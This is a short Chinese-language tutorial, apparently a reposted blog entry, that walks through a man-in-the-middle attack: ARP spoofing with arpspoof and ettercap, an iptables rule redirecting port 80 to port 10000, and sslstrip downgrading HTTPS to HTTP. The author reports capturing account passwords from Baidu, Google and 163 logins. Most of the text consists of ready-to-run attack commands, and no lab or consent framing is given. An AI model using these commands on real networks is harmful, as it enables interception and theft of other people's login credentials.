***回顧
SSLstrip + EtterCap 中間人***實現https轉換成http 以獲取帳號密碼。
Linux環境下 我們使用iptables過濾一下數據包,然后用sslstrip監聽端口,獲取數據。
數據包轉發 echo 1 > /pro/sys/net/ipv4/ip_forward
然后開啟Ettercap的iptables 功能
把注析去掉
來個arp欺騙不使用sslstrip 來測試一下https
Arpspoof –i –eth0 –t 192.168.1.102 192.168.1.2
Ok
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
NAT 一定的基礎
-T 匹配的表 NAT表 :PREROUTING 修改來的包
:OUTPUT 修改路由前本地的包
:POSTROUTING 修改準備發出的包
-A 表示加入高級選項
-P 協議類型
-J 表示把目標80端口的數據包轉到其他端口 上訴命令是10000端口
開啟ETTERCAP
Ettercap –T –q –I eth0
登錄http的百度 效果良好
監聽到數據了
登錄google
發現在https 卡頓 無法通過
開啟sslstrip
再向google登錄的時候 https變成http
成功登錄
監聽到帳號密碼
百度的
163的登錄
http的跳轉
網速過慢……
除了使用arpspoof 還可以使用
Ettercap –T –q –M arp:remote /192.168.1.101/ //
也是arp欺騙 原理一樣的。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。